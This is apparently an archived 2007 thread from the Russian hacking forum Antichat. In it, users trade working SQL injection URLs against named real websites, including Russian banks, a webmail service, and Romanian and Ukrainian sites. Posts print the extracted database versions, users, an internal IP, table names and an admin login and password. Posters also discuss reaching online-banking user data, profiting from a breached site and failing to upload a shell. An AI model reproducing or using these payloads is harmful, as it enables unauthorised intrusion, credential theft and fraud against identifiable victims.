ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

21.11.2007, 19:45
|
|
Новичок
Регистрация: 21.11.2007
Сообщений: 15
Провел на форуме: 65178
Репутация:
21
|
|
http://www.spylog.ru/
http://dir.spylog.ru/index1.phtml?group=5480%20and%201=5%20union%20sele ct%201%20from%20mysql.user/*
все, что нашел..
таблица
rating.sites
поля
id, name, url, descr
если кто чего еще найдет, отпишитесь, есть некоторые соображения..в плане выжимки бабла с этого сраного спайлога.
|
|
|

21.11.2007, 22:00
|
|
Постоянный
Регистрация: 17.03.2007
Сообщений: 336
Провел на форуме: 3766085
Репутация:
576
|
|
Код:
http://mosdor.ru/?item&id=-3/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,concat(version(),0x3a,database(),0x3a,user()),23,24,25,26,27,28,29,30,31/*
db_andred_4:dbu_andred_4@192.168.3.72
|
|
|

21.11.2007, 22:16
|
|
Участник форума
Регистрация: 03.09.2005
Сообщений: 123
Провел на форуме: 1896022
Репутация:
259
|
|
Код:
http://www.turistor.ro/art/articol.php?id=-7+union+select+1,2,3,4,concat_ws(char(58,58),user(),database(),version()),6,7,8,9,10/*
ovidiuc@localhost:: turistor:: 5.0.32-Debian_7etch1-log
Нашёл таблицу membri, дальше не раскручивал.
|
|
|

22.11.2007, 00:01
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме: 7215020
Репутация:
1423
|
|
http://www.citroen-club.kiev.ua/news.php?id=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user())/*
4.1.22/cit
-----------------------------------------------------------------------------
http://ngo.pskov.ru/tur_club/index.php?action=show_topic&catid=8&id=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4,5,6,7,8,9/*
5.0.44-log/news/infonet@localhost
http://ngo.pskov.ru/tur_club/index.php?action=show_topic&catid=8&id=-1+union+select+1,concat_ws(0x2F,uname,passwd),3,4, 5,6,7,8,9+from+admin+limit+0,1/*
логин/пароль
master/newsbase + еще 6 юзеров
|
|
|

22.11.2007, 01:39
|
|
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме: 1537850
Репутация:
536
|
|
Сайт о кино... http://ww.rmdb.ru/?movie&id=-1+union+select+version(),user()/*
БД 4 =\
|
|
|

22.11.2007, 08:19
|
|
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме: 500695
Репутация:
524
|
|
Румыния
semneparticulare.ro
Код:
http://www.semneparticulare.ro/index.php?catid=-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9/*&catname=Editorial
4.1.22-standard-log:semnepar_ziar:semnepar_semnepa@localhost
linkmagazine.ro
Код:
http://www.linkmagazine.ro/articol.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10/*
4.1.22-standard-log:linkmag_linkmag:linkmag_linkmag@localhost
garsonieraluimaruta.ro
Код:
http://www.garsonieraluimaruta.ro/invitatilist.php?cat=-1+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7/*
4.1.22-standard:garson_main:garson_main@localhost
saloane.ro
Код:
http://www.saloane.ro/articol.php?doc=-1+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10/*
5.0.24a-standard-log:saloane:saloane@goober.dreamhost.com
24 открытых таблицы:
Код:
http://www.saloane.ro/articol.php?doc=-1+union+select+1,2,table_name,4,5,6,7,8,9,10+from+information_schema.tables+limit+23,1/*
... и ни одной интересной
сайт админят скорее всего по фтп: ftp.saloane.ro
|
|
|

22.11.2007, 12:51
|
|
Новичок
Регистрация: 21.11.2007
Сообщений: 15
Провел на форуме: 65178
Репутация:
21
|
|
http://maxitour.ru/hotels?id=-311%20union%20select%201,2,3,4,5,6,7,8,9,10,11,pas sw,13,14,15,16,17,18,19,20,21,22%20from%20users%20/*
все понятно без слов.. пароль расшифруется в три минуты.. а равен он логину..а логин макситурс вроде
http://www.newkenigsberg.ru/index.php?change=-21%20union%20select%201,2,3,concat(login,char(47), password,char(47),admin,char(47),Admtm,char(47),ph oto,char(47),Email,char(47),info,char(47),phone,ch ar(47),address,char(47),anons),5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,33,32,34,35,36,37,38,39,40,41,42,43,44,45,4 6,47,48%20from%20auth_user/*
мускул пятый..все на экране...сайт издательского дома еврорубль..в калининграде
газэнергопромбанк..
не знаю кто как..
http://www.geprobank.ru/press/banknews/?article=-1959%20union%20select%201,2,3,4,5,6,table_name,8,t able_schema,10,11,12%20from%20information_schema.t ables%20limit%2015,1/*
пятый мускул..таблицы наружу..чет смыкал смыкмал..ничего интересного ен насмыкал..пишите.
http://mkb.ru/about_bank/work/vacancy.php?id=31%20AND%201=3%20union%20select%201 ,2,AES_DECRYPT(AES_ENCRYPT(column_name,0x71),0x71) ,4,5,6,7,8,9,10,11,12%20from%20information_schema. columns%20where%20table_name='users'%20AND%20table _schema='struct'%20limit%201,1/*
московский кредитный банк.. да защита у банков нынче никакая..еще с менатепа все начинал.. есть две или три таблицы юзерз ..правда инфа в них разнаю.. бд с инфой о юзерах онлайн банкинга находится на другом серваке..пролезть не удалось, если кто откроет новые просторы для боевых действий, просьба отписаться..
вот тут прикольно ..уралвеб..почта!
http://www.uralweb.ru/tourism/index.php?region_sel=all&tour_sel=-4%20UNION%20select%201,2,table_name,4,5,6,7,8,9%20 from%20information_schema.tables%20/*&place=47
есть бд mail..там чет типа аккаунтс или мемберс..ну найти легко, опять же пятый мускул ..смотрим имена таблиц и полей.. находим почтовик с открытыми паролями..юзаем кто кому как надо.. залить шел так и не получилось..
|
|
|

22.11.2007, 15:47
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме: 7215020
Репутация:
1423
|
|
http://www.shsb.ru/seminar.php?id=-1+union+select+1,concat_ws(0x2F,version(),database (),user()),3,4,5,6,7,8,9,10/*
4.1.20/nshp/nshp@localhost
-----------------------------------------------------------------
rus.srbc.ru
http://rus.srbc.ru/home.asp?artId=-1+or+1=@@version--
Microsoft SQL Server 2005 - 9.00.1406.00 (Intel X86) Mar 3 2007 18:40:02 Copyright (c) 1988-2005 Microsoft Corporation Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
http://rus.srbc.ru/home.asp?artId=-1+or+1=(select+user)--
all_from_web
http://rus.srbc.ru/home.asp?artId=-1+or+1=(select+db_name())--
BusinessClub
http://rus.srbc.ru/home.asp?artId=-1+or+1=(select+top+1+table_name+from+information_s chema.tables)--
В таблицах не копался
|
|
|

22.11.2007, 16:28
|
|
Новичок
Регистрация: 09.11.2007
Сообщений: 8
Провел на форуме: 37581
Репутация:
15
|
|
http://www.pollit.ru/?post=-1'
|
|
|

22.11.2007, 17:44
|
|
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме: 12702287
Репутация:
4738
|
|
www.theblocparty.org
Код:
_http://www.theblocparty.org/friends/index.php?mode=events&act=viewevent&seid=-1+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*
www.onlyfabrics.com
Код:
_http://www.onlyfabrics.com/friends/index.php?mode=events&act=viewevent&seid=-1+union+select+1,2,3,user(),version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
ЗЫ подробно о скуле в AlstraSoft E-Friends читаем тут: https://forum.antichat.ru/thread54157.html
Последний раз редактировалось -=lebed=-; 22.11.2007 в 17:57..
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|